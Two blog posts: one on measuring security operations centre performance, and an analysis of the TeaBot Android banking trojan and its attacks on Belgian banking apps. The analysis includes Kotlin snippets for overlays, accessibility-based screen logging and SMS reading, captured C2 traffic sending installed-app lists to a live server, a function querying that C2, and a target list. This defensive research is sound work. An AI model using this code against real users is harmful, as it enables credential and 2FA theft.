
Going beyond traditional metrics: 3 key strategies to measuring your SOC performance

26 May 2021 at 11:59

Establishing a Security Operations Center is a great way to reduce the risk of cyber attacks damaging your organization by detecting and investigating suspicious events derived from infrastructure and network data. In traditionally heavily regulated industries such as banking, the motivation to establish a SOC is often further complemented by a regulatory requirement. It is therefore no wonder that SOCs have been and still are on the rise. As for in-house SOCs, “only 30 percent of organizations had this capability in 2017 and 2018, that number jumps to over half (51%)” (DomainTools).

But as usual, increased security and risk reduction come at a cost, and a SOC’s price tag can be significant. On top of the cost of SIEM tooling come the salaries of in-demand cyber security professionals, which reflect their scarcity on the job market, as well as the cost of setting up and maintaining the systems, developing processes and procedures, and running regular trainings and awareness measures.

It is only fair to expect the return on investment to reflect the large sum of money spent – that is, for the SOC to run effectively and efficiently in order to secure further funding. But what does that mean?

I would like to briefly discuss a few key points when it comes to properly evaluating a SOC’s performance and capabilities. I will refrain from proposing a one-size-fits-all approach, but rather outline the common issues I have encountered and the approach I prefer for avoiding them.

I will take into account that – like many security functions – a well-operating SOC can be perceived as a bit of a black box, as it will prevent large-scale security incidents from occurring, making it seem like the company is not at risk and is spending too much on security. Since cost and budget are always important factors in risk management, the right balance has to be found between providing clear and understandable numbers and sticking to performance indicators that actually signify performance.

The limitations of security by numbers and metrics-based KPIs

To demonstrate performance, metrics and key performance indicators (KPIs) are often employed. A metric is an atomic data point (e.g. the number of tickets an analyst closed in a day), while a KPI sets an expected or acceptable range for that metric to fall into (e.g. each analyst is supposed to close between x and x+y tickets in a day).

The below table from the SANS institute’s 2019 SOC survey conveys that the top 3 metrics used to track and report a SOC’s performance are the number of incidents/cases handled, the time from detection to containment to eradication (i.e. the time from detection to full closure) and the number of incidents/cases closed per shift.

Figure 1 – SANS, Common and Best Practices for Security Operations Centers: Results of the 2019 SOC Survey

Metrics are popular because they quantify complex matters into one or several simple numbers. As the report states, “It’s easy to count; it’s easy to extract this data in an automated fashion; and it’s an easy way to proclaim, ‘We’re doing something!’ Or, ‘We did more this week than last week!’” (SANS Institute). But busy does not equal secure.

There are 3 main issues that can arise when using metrics and KPIs to measure a SOC’s performance:

  • Picking out metrics commonly associated with a high workload or speed does not ensure that the SOC is actually performing well. This is most apparent with the second-most used metric, the time it takes to fully resolve an incident, as this will vary greatly depending on the complexity of the cases. Complex incidents may take months to actually resolve (including full scoping, containment, communication and lessons learned). Teams should not be punished for being diligent where diligence is required.
    A metric such as the number of cases handled or closed is an atomic piece of information without much context or meaning to it. This data point could be made into a KPI by defining a range the metric would need to fall into to be deemed acceptable. That works well if the expected value range can be foreseen and quantified, as in ‘You answered 8 out of 10 questions correctly’. For a SOC, there is no fixed number of cases that can reliably be expected to come up each shift.
  • Furthermore, the number of alerts processed and tickets closed can easily be influenced via the detection rules configuration. While generally the “most prominent challenge for any monitoring system—particularly IDSes—is to achieve a high true positive rate” (MITRE), a KPI based on alert volume creates an incentive to work in the opposite direction. As shown below in Figure 2, more advanced detection capabilities will likely reduce the number of alerts generated by the SIEM, allowing analysts to spend more time drilling down on the remaining key alerts and on complementary threat hunting.
Figure 2 – Mitre, Ten Strategies of a World-Class Cybersecurity Operations Center
  • Lessons learned and the respective improvement of the SOC’s capabilities are rarely rewarded with such metrics, resulting in less incentive to perform these essential activities regularly and diligently.

Especially when KPIs are used to evaluate individual people’s performance and eventually affect bonus or promotion decisions, great care must be taken to not create a conflict of interest between reaching an arbitrary target and actually improving the quality of the SOC. Bad KPIs can result in inefficiencies being rewarded and even increase risk.

Metrics and KPIs certainly have their use, but they must be chosen wisely in order to actually indicate risk reduction via the SOC as well as to avoid conflicting incentives.

Below I will highlight strategies on how to rethink KPIs and SOC performance evaluation.

Operating model-based targets

To understand how to evaluate whether the SOC is doing well, it is crucial to focus on the SOC’s purpose. To do so, the SOC target operating model is the golden source. A target operating model should be mandatory for each and every SOC, especially in the early stages. It details how the SOC integrates into the organization, why it was established and what it will and will not do. Clearly outlining the purpose of the SOC in the operating model, as well as establishing how the SOC plans to achieve this goal, can help to set realistic and strategically sound measures of performance and success. If you don’t know what goal the SOC is supposed to achieve, how can you measure if it got there?

One benefit of this approach is that it allows for a more holistic view on what constitutes ‘the SOC’, taking into account the maturity of the SOC as well as the people, processes and technology trinity that makes up the SOC.

A target operating model-based approach will work from the moment a SOC is being established. Which data sources are planned to be onboarded (and why)? How will detection capabilities be linked to risk, e.g. via a mapping to MITRE? Do you want to automate your response activities? These are key milestones that provide value to the SOC and reaching them can be used as indicators of performance especially in the first few years of establishing and running the SOC.

Formulating Objectives and Key Results (OKR)

From the target operating model, you can start deriving objectives and key results (OKRs) for the SOC. The idea of OKRs is to define an objective (what should be accomplished) and associate key results with it that have to be achieved to get there. KPIs can fit into this model by serving as key results, but linking them with an objective makes sure that they are meaningful and help to achieve a strategic goal (Panchadsaram).

The objectives chosen can be either project or operations-oriented. A project-oriented objective can refer to a new capability that is to be added to the SOC, e.g. the integration of SOAR capabilities for automation. The key results for this objective are then a set of milestones to complete, e.g. selecting a tool, creating an automation framework and completing a POC.

KPIs are generally well suited when it comes to daily operations. Envisioning the SOC as a service within the organization can help to define performance-oriented baselines to monitor the SOC’s health as well as to steer operational improvements.

  • While the number of cases handled is not a good measure of efficiency on its own, it would be odd if a SOC had not even a single case in a month or two, allowing this metric to act as one component to an overall health and plausibility check. If you usually get 15-25 cases each day and suddenly there is radio silence, you may want to check your systems.
  • The total number of cases handled and the number of cases closed per shift can serve to steer operational efficiency by indicating how many analysts the SOC should employ based on the current case volume.

To implement operational KPIs, metrics can be documented over a period of time to be analyzed at the end of a review cycle – e.g. once per quarter – to decide where the SOC has potential for improvement. This way, realistic targets can be defined tailored to the specific SOC.

Testing the SOC’s capabilities

While metrics and milestones can serve as a conceptual indicator of the SOC’s ability to effectively identify and act on security incidents, it is simply impossible to be sure without seeing the SOC’s capabilities applied in an actual incident. You would need to wait for an actual incident to strike, which is not something you can plan, foresee, or even want to happen. In reality, some SOCs may never face a large incident. This means that they either got very lucky or that they missed something critical. Which of the two is true, they will never know. It is very possible to be compromised without knowing.

Purple teaming is a great exercise to see how the SOC is really doing. Purple teaming refers to an activity where the SOC (the ‘blue team’) and penetration testers (the ‘red team’) work together in order to simulate a realistic attack scenario. The actual execution can vary from a complete surprise test where the red teamers act without instructions – just like a real attacker would – to more defined approaches where specific attack steps are performed in order to confirm if and when they are being detected.

When you simulate an attack in this way, you know exactly what the SOC should have detected and what it actually found. If there is a gap, the exercise provides good visibility on where to follow up in improving the SOC’s capabilities. Areas of improvement can range from a missing data source in the SIEM to a lack of training and experience for analysts. There is rarely a better opportunity to cover people, processes and technology in one single practical assessment.

It is important that these tests are not seen as a threat to the SOC, especially if it turns out that the SOC does not detect the red team’s activities. Red teaming may therefore be understood as “a practical response to a complex cultural problem” (DCDC), where an often valuable team-oriented culture revolving around cohesion under stress can “constrain[] thinking, discourage[] people from speaking out or exclude[] alternative perspectives” (DCDC). The whole purpose of the exercise is to identify such blind spots, which – especially when conducted for the first time – can be larger than expected. This may discourage some SOC managers from conducting these tests, fearing that they will make them look bad in front of senior management.

Management should therefore encourage such exercises from an early stage and clearly express what they expect as an outcome: That gaps are closed after a proper assessment, not that no gaps will ever show up. If “done well by the right people using appropriate techniques, red teaming can generate constructive critique of a project, inject broader thinking to a problem and provide alternative perspectives to shape plans” (DCDC).

Conducting such testing early on and on a regular basis – at least once a year – can help improve the SOC’s performance as well as steer investments the right way, eventually saving money for the organization. Budget can be used effectively to close gaps and to set priorities instead of blindly adding capabilities such as tools or data sources that end up underused and eventually discarded.

Summary

Establishing and running a SOC is a complex and expensive endeavor that should yield more benefit to a company than a couple of checks on compliance checklists. Unfortunately, classic SOC metrics are often insufficient to indicate actual risk reduction. Furthermore, metrics can set incentives to work inefficiently and thus waste money and provide a false sense of security.

A strategy-focused approach, which measures whether the SOC as an organizational unit is reaching its targets, facilitated by a target operating model and complemented by well-defined OKRs and operational KPIs, can be of great benefit in leading the SOC to reduce risk more efficiently.

To really know if the SOC is capable of identifying and responding to incidents, regular tests should be conducted in a purple team manner, starting early on and making them a habit as the SOC improves its maturity.

Sarah Wisbar

Sarah Wisbar is a GCDA- and GCFA-certified IT security expert. With several years of experience as a team lead and senior consultant in the financial services sector under her belt, she now manages the NVISO SOC. She likes implementing lean but efficient processes in operations and keeps her eyes on the ever-changing threat landscape to strengthen the SOC’s defenses.

Sources

DomainTools: https://www.domaintools.com/content/survey_security_report_card_2019.pdf

SANS Institute: https://www.sans.org/media/analyst-program/common-practices-security-operations-centers-results-2019-soc-survey-39060.pdf

MITRE: https://www.mitre.org/sites/default/files/publications/pr-13-1028-mitre-10-strategies-cyber-ops-center.pdf

DCDC: https://www.act.nato.int/images/stories/events/2011/cde/rr_ukdcdc.pdf

Panchadsaram: https://www.whatmatters.com/resources/difference-between-okr-kpi/

New mobile malware family now also targets Belgian financial apps

11 May 2021 at 15:14

While banking trojans have been around for a very long time now, we have never seen a mobile malware family attack the applications of Belgian financial institutions. Until today…

Earlier this week, Italy-based Cleafy published an article about a new Android malware family which they dubbed TeaBot. The sample we will take a look at doesn’t use a lot of obfuscation and only has a limited set of features. What is interesting, though, is that TeaBot actually does attack the mobile applications of Belgian financial institutions.

This is quite surprising, since banking trojans typically use a phishing attack to acquire the credentials of unsuspecting victims. Those credentials would be fairly useless against Belgian financial applications, as they all have secure device enrollment and authentication flows which are resilient against a phishing attack.

So let’s take a closer look at how these banking trojans work, how they are actually trying to attack Belgian banking apps and what can be done to protect these apps.

TL;DR

  • Typical banking malware uses a combination of Android accessibility services and overlay windows to construct an elaborate phishing attack
  • Belgian apps are being targeted with basic phishing attacks and keyloggers which should not result in an account takeover

Android Overlay Attacks

There have been numerous articles written on Android Overlay attacks, including a very recent one from F-Secure labs: “How are we doing with Android’s overlay attacks in 2020?” For those who have never heard of it before, let’s start with a small overview.

Drawing on top of other apps through overlays (SYSTEM_ALERT_WINDOW)

The Android OS allows apps to draw on top of other apps after they have obtained the SYSTEM_ALERT_WINDOW permission. There are valid use cases for this, with Facebook Messenger’s chat heads being the typical example. These chat bubbles stay on top of any other application to allow the user to quickly access their conversations without having to go to the Messenger app.

Overlays have two interesting properties: whether or not they are transparent, and whether or not they are interactive. If an overlay is transparent you will be able to see whatever is underneath the overlay (either another app or the home screen), and if an overlay is interactive it will register any screen touches, while the app underneath will not. Below you can see two examples of this. On the left, there’s Facebook’s Messenger app, which has many interactive views, but also some transparent parts at the top, while on the right you see Twilight, a blue light filter that covers the entire screen in a semi-transparent way without any interactive elements in the overlay. The controls that you do see with Twilight are the actual Twilight app that’s opened underneath the red overlay.

Until very recently, if the app was installed through the Google Play store (instead of through sideloading or third-party app stores), the application automatically received this permission, without even a confirmation dialog for the user! After much abuse by banking malware that was installed through the Play store, Google has now added an additional manual verification step in the approval process for apps on the Google Play store. If the app wants to have the permission without requesting it from the user, it will need to request special permission from Google. But of course, an app can still manually request this permission from the user, and Android’s information for this permission looks rather innocent: “This may interfere with your use of other apps”.
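To make the mechanics more concrete, here is a minimal Kotlin sketch (the function name and layout parameters are illustrative, not taken from any real app or sample) of how an app holding this permission can place a view on top of whatever the user is doing:

import android.content.Context
import android.graphics.PixelFormat
import android.provider.Settings
import android.view.Gravity
import android.view.View
import android.view.WindowManager

// Minimal sketch: draw a view on top of all other apps once the user has
// granted "Display over other apps" (SYSTEM_ALERT_WINDOW).
fun showOverlay(context: Context, overlayView: View) {
    if (!Settings.canDrawOverlays(context)) return

    val params = WindowManager.LayoutParams(
        WindowManager.LayoutParams.MATCH_PARENT,
        WindowManager.LayoutParams.WRAP_CONTENT,
        // TYPE_APPLICATION_OVERLAY is the overlay type for API 26+.
        WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,
        // FLAG_NOT_TOUCHABLE makes the overlay "click-through": touches fall
        // through to whatever is underneath it.
        WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE or
            WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE,
        PixelFormat.TRANSLUCENT
    ).apply { gravity = Gravity.TOP }

    val windowManager = context.getSystemService(Context.WINDOW_SERVICE) as WindowManager
    windowManager.addView(overlayView, params)
}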

The permission is fairly benign in the hands of the Facebook Messenger app or Twilight, but for mobile malware, the ability to draw on top of other apps is extremely interesting. There are a few ways in which you can use this to attack the user:

  1. Create a fake UI on top of a real app that tricks the user into touching specific locations on the screen. Those locations will not be interactive, and will thus propagate the touch to the underlying application. As a result, the user performs actions in the underlying app without realizing it. This is often called Tapjacking.
  2. Create interactive fields on top of key fields of the app in order to harvest information such as usernames and passwords. This requires the overlay to track what is being shown in the app, so that it can correctly align its own buttons and text fields. All in all, this is quite some work and not often used to attack the user.
  3. Instead of only overlaying specific buttons, the overlay covers the entire app and pretends to be the app. A fully functional app (usually a webview) is shown on top of the targeted app and asks the user for their credentials. This is a full overlay attack.

These are just three possibilities, but there are many more. Researchers from Georgia Tech and UC Santa Barbara have documented different attacks in their paper, which also introduces the Cloak and Dagger attacks explained below.

Before we get into Cloak and Dagger, let’s take a look at a few other dangerous Android permissions first.

Accessibility services

Applications on Android can request the accessibility services permission, which allows them to simulate button presses or interact with UI elements outside of their own application. These apps are very useful to people with disabilities who need a bit of extra help to navigate their smartphone. For example, the Google TalkBack application will read out any UI element that is touched on the screen, and requires a double click to actually register as a button press. An alternative application is the Voice Access app which tags every UI element with a number and allows you to select them by using voice commands.

Left: Giving permission to the TalkBack service. Android clearly indicates the dangers of giving this permission
Middle: TalkBack uses text-to-speech to read the description that the user taps
Right: Voice Access adds a button to each UI control and allows you to click them through voice commands

Both of these applications can read UI elements and perform touches on the user’s behalf. Just like overlay windows, this can be a very nice feature, or very dangerous if abused. Malware could use accessibility services to create a keylogger which collects the input of a text field any time data is entered, or it could press buttons on your behalf to purchase premium features or subscriptions, or even just click advertisements.
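As a minimal Kotlin illustration of that capability (the class name and log tag are made up, and the service would still need the usual accessibility-service declaration in the manifest), a few lines are enough for a service to observe text across apps:

import android.accessibilityservice.AccessibilityService
import android.util.Log
import android.view.accessibility.AccessibilityEvent

// Minimal sketch: once the user enables this service, it receives events for
// views the user touches, focuses or types into, across all applications.
class ScreenLoggingService : AccessibilityService() {

    override fun onAccessibilityEvent(event: AccessibilityEvent) {
        when (event.eventType) {
            AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED,
            AccessibilityEvent.TYPE_VIEW_CLICKED,
            AccessibilityEvent.TYPE_VIEW_FOCUSED ->
                // event.text holds the visible text of the affected view.
                Log.d("ScreenLogger", "${event.packageName}: ${event.text}")
            else -> Unit
        }
    }

    override fun onInterrupt() {
        // Nothing to clean up in this sketch.
    }
}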

So let’s take a quick look at what kind of information becomes available by installing the Screen Logger app. The Screen Logger app is a legitimate application that uses accessibility features to monitor your actions. At the time of writing, the application doesn’t even request INTERNET permission, so it shouldn’t be stealing your data in any way. However, it’s always best to do these tests on a device without sensitive data which you can factory-reset. The application is very basic:

  • Install the accessibility service
  • Click the record button
  • Perform some actions and enter some text
  • Click the stop recording button

The app will then show all the information it has collected. Below are some examples of the information it collected from a test app:

The Screen logger application shows the data that was collected through an accessibility service

When enabling accessibility services, users are actually warned about the dangers of enabling accessibility. This makes it a bit harder to trick the user into granting this permission. More difficult, but definitely not impossible. Applications actually have a lot of control over the information that is shown to the user. Take for example the four screens below, which belong to a malware sample. All of the text indicated with red is under control of the attacker. The first screen shows a popup window asking the user to enable the Google service (which is, of course, the name of the malware’s service), and the next three screens are what the user sees while enabling the accessibility permission.

Tricking users into installing an accessibility service

Even if malware can’t convince the user to give the accessibility permission, there’s still a way to trick them using overlay windows. This approach is exactly what Cloak and Dagger does.

Cloak and Dagger

Cloak and Dagger is best explained through their own video, where they show a combination of overlay attacks and accessibility to install an application that has all permissions enabled. In the video shown below, anything that is red is non-transparent and interactive, while everything that is green or transparent is non-interactive and will let touches go through to the app underneath.

Now, over the past few years, Android has made efforts to hinder these kinds of attacks. For example, on newer versions of Android, it’s not possible to configure accessibility settings in case an overlay is active, or Android automatically disables any overlays when going into the Accessibility settings page. Unfortunately this only prevents a malware sample from giving itself accessibility permissions through overlays; it still allows malware to use social engineering tactics to trick users into installing them.

Read SMS permission

Finally, another interesting permission for malware is the RECEIVE_SMS permission, which allows an application to read received SMS messages. While this can definitely be used to invade the user’s privacy, the main reason for malware to acquire this permission is to intercept 2FA tokens which are unfortunately often still sent through SMS. Next to SIM-swapping attacks and attacks against the SS7 infrastructure, this is another way in which those tokens can be stolen.

This permission is pretty self-explanatory and a typical user will probably not grant the permission to a game that they just installed. However, by using phishing, overlays or accessibility attacks, malware can make sure the user accepts the permission.
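To illustrate why this matters for 2FA, here is a hedged Kotlin sketch of what an app holding RECEIVE_SMS can observe (the receiver name is illustrative, and it would still need to be registered in the manifest):

import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.provider.Telephony
import android.util.Log

// Minimal sketch: a receiver registered for SMS_RECEIVED sees every incoming
// message body, including SMS-based 2FA codes.
class IncomingSmsReceiver : BroadcastReceiver() {
    override fun onReceive(context: Context, intent: Intent) {
        if (intent.action == Telephony.Sms.Intents.SMS_RECEIVED_ACTION) {
            for (message in Telephony.Sms.Intents.getMessagesFromIntent(intent)) {
                Log.d("SmsReceiver", "${message.originatingAddress}: ${message.messageBody}")
            }
        }
    }
}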

Does this mean your device is fully compromised? Yes, and no.

Given the very intrusive nature of the attacks described above, it’s not a stretch to say that your device is fully compromised. If malware can access what you see, monitor what you do and perform actions on your behalf, they’re basically using your device just like you would. However, the malware is still (ab)using legitimate functionality provided by the OS, and that does come with restrictions.

For example, even applications with full accessibility permissions aren’t able to access data that is stored inside the application container of another app. This means that private information stored within an app is safe, unless you of course access the data through the app and the accessibility service actively collects everything on the screen.

By combining accessibility and overlay windows, it is actually much easier to social engineer the victim and get their credentials or card information. And this is exactly what Banking Trojans often do. Instead of attacking an application and trying to steal their authentication tokens or modify their behavior, they simply ask the user for all the information that’s required to either authenticate to a financial website or enroll a new device with the user’s credentials.

How to protect your app

Protecting against overlays

Protecting your application against a full overlay is, well, impossible. Some research has already been performed on this and one of the suggestions is to add a visual indicator on the device itself that can inform the user about an overlay attack taking place. Another study took a look at detecting suspicious patterns during app review to identify overlay malware. While the research is definitely interesting, it doesn’t really help you when developing an application.

And even if you could detect an overlay on top of your application, what could your application do? There are a few options, but none of them really work:

  • Close the application > Doesn’t matter, the attack just continues, since there’s a full overlay
  • Show something to the user to warn them > Difficult, since you’re not the top-level view
  • Inform the backend and block the account > Possible, though with many false positives. Imagine customer accounts being blocked because they have Facebook Messenger installed…

What remains is trying to detect an attack and informing your backend. Instead of directly blocking an account, the information could be taken into account when performing risk analysis on a new sign-up or transaction. There are a few ways to collect this information, but all of them can have many false positives:

  • You can detect if a screen has been obscured by listening for onFilterTouchEventForSecurity events. There are however various edge cases where it doesn’t work as expected and will lead to many false negatives and false positives.
  • You can scan for installed applications and check if a suspicious application is installed. This would require you to actively track mobile malware campaigns and update your blacklist accordingly. Given the fact that malware samples often have random package names, this will be very difficult. Additionally, starting with Android 11 (R), it actually becomes impossible to scan for applications which you don’t declare in your Android manifest.
  • You can use accessibility services yourself to monitor which views are created by the Android OS and trigger an error if specific scenarios occur. While this could technically work, it would give people the idea that financial applications do actually require accessibility services, which would play into the hands of malware developers.

The only real feasible implementation is detection through the onFilterTouchEventForSecurity handler, and, given the many false positives, it can only be used in conjunction with other information during a risk assessment.
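A minimal Kotlin sketch of that detection path could look as follows (the view and callback names are made up; how the signal reaches your backend is up to the app):

import android.content.Context
import android.view.MotionEvent
import android.widget.Button

// Minimal sketch: a sensitive button that reports touches arriving while
// another window is drawn on top of it, so the signal can feed into backend
// risk scoring rather than blocking the user outright.
class ObscuredTouchReportingButton(context: Context) : Button(context) {

    var onObscuredTouch: (() -> Unit)? = null

    override fun onFilterTouchEventForSecurity(event: MotionEvent): Boolean {
        if (event.flags and MotionEvent.FLAG_WINDOW_IS_OBSCURED != 0) {
            // Benign overlays (chat heads, blue light filters) trigger this too,
            // hence: report, don't block.
            onObscuredTouch?.invoke()
        }
        return super.onFilterTouchEventForSecurity(event)
    }
}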

Protecting against accessibility attacks

Unfortunately it’s not much better than the section. There are many different settings you can set on views, components and text fields, but all of them are designed to help you improve the accessibility of your application. Removing all accessibility data from your application could help a bit, but this will of course also stop legitimate accessibility software from analyzing your application.

But let’s for a moment assume that we don’t care about legitimate accessibility. How can we make the app as secure as possible to prevent malware from logging our activities? Let’s see…

  • We could set the android:importantForAccessibility attribute of a view component to ‘no’ or ‘noHideDescendants’. This won’t work however, since the accessibility service can just ignore this property and still read everything inside the view component.
  • We could set all the android:contentDescription attributes to “@null”. This will effectively remove all the meta information from the application and will make it much more difficult to track a user. However, any text that’s on screen can still be captured, so the label of a button will still give information about its purpose, even if there is no content description. For input text, the content of the text field will still be available to the malware.
  • We could change every input text to a password field. Password fields are masked and their content isn’t accessible in clear-text format. Depending on the user’s settings, this won’t work either (see next section).
  • Enable FLAG_SECURE on the view. This will prevent screenshots of the view, but it doesn’t impact accessibility services.
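For completeness, here is a combined Kotlin sketch of several of the options above (a hedged illustration; as the list explains, none of this reliably hides content from an accessibility-based keylogger):

import android.app.Activity
import android.view.View
import android.view.WindowManager
import android.widget.EditText

// Minimal sketch of the hardening options discussed above.
fun hardenSensitiveField(activity: Activity, secretField: EditText) {
    // FLAG_SECURE blocks screenshots and screen recording, not accessibility.
    activity.window.setFlags(
        WindowManager.LayoutParams.FLAG_SECURE,
        WindowManager.LayoutParams.FLAG_SECURE
    )
    // An accessibility service is free to ignore this hint.
    secretField.importantForAccessibility = View.IMPORTANT_FOR_ACCESSIBILITY_NO_HIDE_DESCENDANTS
    // Strips metadata, but the on-screen text itself stays readable to services.
    secretField.contentDescription = null
}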

About passwords

By default, Android shows the last entered character in a password field. This is useful for the user as they are able to see if they mistyped something. However, whenever this preview is shown, the value is also accessible to the accessibility services. As a result, we can still steal passwords, as shown in the second and third image below:

Left: A password being entered in ProxyDroid
Middle / Right: The entered password can be reconstructed based on the character previews

It is possible for users to disable this feature by going to Settings > Privacy > Show Passwords, but this setting cannot be manipulated from inside an application.

Detecting accessibility services

If we can’t protect our own application, can we maybe detect an attack? Here is where there’s finally some good news. It is possible to retrieve all the accessibility services running on the device, including their capabilities. This can be done through the AccessibilityManager.getEnabledAccessibilityServiceList.

This information could be used to identify suspicious services running on the device. It would require building a dataset of known-good services to compare against. Given that Google is really clamping down on applications requiring accessibility services in the Google Play store, this could be a valid approach.
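A minimal Kotlin sketch of how such an inventory could be collected (the allow-list comparison and any reporting are assumed to live elsewhere in the app):

import android.accessibilityservice.AccessibilityServiceInfo
import android.content.Context
import android.view.accessibility.AccessibilityManager

// Minimal sketch: list the enabled accessibility services and whether they can
// retrieve window content, e.g. to compare against a set of known-good services.
fun enabledAccessibilityServices(context: Context): List<String> {
    val manager =
        context.getSystemService(Context.ACCESSIBILITY_SERVICE) as AccessibilityManager
    return manager
        .getEnabledAccessibilityServiceList(AccessibilityServiceInfo.FEEDBACK_ALL_MASK)
        .map { info ->
            val readsContent = info.capabilities and
                AccessibilityServiceInfo.CAPABILITY_CAN_RETRIEVE_WINDOW_CONTENT != 0
            "${info.id} readsWindowContent=$readsContent"
        }
}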

The obvious downside is that there will still be false positives. Additionally, there may be some privacy-related issues as well, since it might not be desirable to identify disabilities in users.

Can’t Google fix this?

For a large part, dealing with these overlay attacks is Google’s responsibility, and over the last few versions, they have made multiple changes to make it more difficult to use the SYSTEM_ALERT_WINDOW (SAW) overlay permission:

  • Android Q (Go Edition) doesn’t support the SAW.
  • Sideloaded apps on Android P lose the SAW permission upon reboot.
  • Android O has marked the SAW permission deprecated, though Android 11 has removed the deprecated status.
  • Play Store apps on Android Q lose the permission on reboot.
  • Android O shows a notification for apps that are performing overlays, but also allows you to disable the notifications through settings (and thus through accessibility as well).
  • Android Q introduced the Bubbles API, which deals with some of the use cases for SAW, but not all of them.

Almost all of these updates are mitigations and don’t fix the actual problem. Only the removal of SAW in Android Q (Go Edition) is a real way to stop overlay attacks, and it may hopefully one day make it into the standard Android version as well.

Android 12 Preview

The latest version of the Android 12 preview actually contains a new permission called ‘HIDE_OVERLAY_WINDOWS‘. After acquiring this permission, an app can call ‘setHideOverlayWindows()’ to disable overlays. This is another step in the right direction, but it’s still far from great. Instead of targeting the application when the user opens it, the malware could still create fake notifications that link directly to the overlay without the targeted application even being opened.
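Assuming the API ships as in the preview, using it would look roughly like this (the activity name is illustrative, and the HIDE_OVERLAY_WINDOWS permission must be declared in the manifest):

import android.app.Activity
import android.os.Build
import android.os.Bundle

// Minimal sketch of the Android 12 call mentioned above.
class SensitiveFlowActivity : Activity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.S) {
            // Hides non-system overlay windows while this window is showing.
            window.setHideOverlayWindows(true)
        }
    }
}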

It’s clear that it’s not an easy problem to fix. Developers were given the option to use SAW since Android 1, and many apps rely on the permission to provide their core functionality. Removing it would affect many apps, and would thus get a lot of backlash. Finally, any new update that Google makes will take many years to reach a high percentage of Android users, due to Android’s slow update process and unwillingness for mobile device manufacturers to provide major OS updates to users.

Now that we understand the permissions involved, let’s go back to the TeaBot malware.

TeaBot – Attacking Belgian apps

What was surprising about Cleafy’s original report is the targeting of Belgian applications, which so far had been spared from similar attacks. This is all the more unexpected since Belgian financial apps all make use of strong authentication (card readers, ItsMe, etc.) and are thus pretty hard to successfully phish. Let’s take a look at how exactly the TeaBot family attacks these applications.

Once the TeaBot malware is installed, it shows the user a small animation on how to enable accessibility options. It doesn’t provide a specific explanation for the accessibility service, and it doesn’t pretend to be a Google or System service. However, if you wait too long to activate the accessibility service, the device will regularly start vibrating, which is extremely annoying and will surely convince many victims to enable the services.

  • Main view when opening the app
  • Automatically opens the Accessibility Settings
  • No description of the service
  • The service requests full control
  • If you wait too long, you get annoying popups and vibration
  • After enabling the service, the application quits and shows an error message

This specific sample pretends to be bpost, but TeaBot also pretends to be the VLC Media Player, the Spanish postal app Correos, a video streaming app called Mobdro, and UPS as well.

The malware sample has the following functionality related to attacking financial applications:

  • Take a screenshot;
  • Perform overlay attacks on specific apps;
  • Enable keyloggers for specific apps.

Just like the FluBot sample from our last blogpost, the application collects all of the installed applications and then sends them to the C2 which returns a list of the applications that should be attacked:

POST /api/getbotinjects HTTP/1.1
Accept-Charset: UTF-8
Content-Type: application/xml
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Nexus 5 Build/QQ3A.200805.001)
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 776

{"installed_apps":[{"package":"org.proxydroid"},{"package":"com.android.documentsui"}, ...<snip>... ,{"package":"com.android.messaging"}]}
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 2
Date: Mon, 10 May 2021 19:20:51 GMT

[]

In order to identify the applications that are attacked, we can supply a list of banking applications which will return more interesting data:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 2031830
Date: Mon, 10 May 2021 18:28:01 GMT

[
	{
		"application":"com.kutxabank.android",
		"html":"<!DOCTYPE html><html lang=\"en\"><head> ...SNIP...</html>",
		"inj_type":"bank"
	},
	{
		"application":"com.bbva.bbvacontigo",
		"html":"<!DOCTYPE html><html lang=\"en\"><head> ...SNIP...</html>"
	}
]
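For reference, a hedged Kotlin sketch of how such a query can be reproduced (the C2 host is a placeholder, error handling is omitted, and the real sample builds the package list from the victim’s installed apps):

import java.net.HttpURLConnection
import java.net.URL

// Minimal sketch: POST a candidate package list to the getbotinjects endpoint
// and return the raw JSON response containing the overlay definitions.
fun queryInjects(c2Host: String, packages: List<String>): String {
    val body = packages.joinToString(
        prefix = """{"installed_apps":[""",
        postfix = "]}",
        separator = ","
    ) { """{"package":"$it"}""" }

    val connection = URL("http://$c2Host/api/getbotinjects").openConnection() as HttpURLConnection
    connection.requestMethod = "POST"
    connection.doOutput = true
    connection.outputStream.use { it.write(body.toByteArray()) }
    // The response is a JSON array of {application, html, inj_type} entries.
    return connection.inputStream.bufferedReader().use { it.readText() }
}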

By brute-forcing against different C2 servers, overlays for the following apps were returned:

app.wizink.es
be.belfius.directmobile.android
com.abanca.bancaempresas
com.abnamro.nl.mobile.payments
com.bancomer.mbanking
com.bankia.wallet
com.bankinter.launcher
com.bbva.bbvacontigo
com.bbva.netcash
com.cajasur.android
com.db.pwcc.dbmobile
com.facebook.katana
com.google.android.gm
com.grupocajamar.wefferent
com.ing.mobile
com.kutxabank.android
com.latuabancaperandroid
com.rsi
com.starfinanz.smob.android.sfinanzstatus
com.tecnocom.cajalaboral
com.unicredit
de.comdirect.android
de.commerzbanking.mobil
es.bancosantander.apps
es.cm.android
es.ibercaja.ibercajaapp
es.lacaixa.mobile.android.newwapicon
es.liberbank.cajasturapp
es.openbank.mobile
es.univia.unicajamovil
keyloggers.json
www.ingdirect.nativeframe

Only one Belgian financial application (be.belfius.directmobile.android) returned an overlay. The interesting part is that the overlay only phishes for credit card information and not for anything related to account onboarding:

The overlay requests the debit card number, but nothing else.

This overlay will be shown when TeaBot detects that the Belfius app has been opened. This way the user will expect a Belfius prompt to appear, which gives more credibility to the malicious view that was opened.

The original report by Cleafy specified at least 5 applications under attack, so we need to dig a bit deeper. Another endpoint called by the samples is /getkeyloggers. Fortunately, this one does simply return a list of targeted applications without us having to guess.

GET /api/getkeyloggers HTTP/1.1
Accept-Charset: UTF-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Nexus 5 Build/QQ3A.200805.001)
Host: 185.215.113.31
Connection: close
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 1205
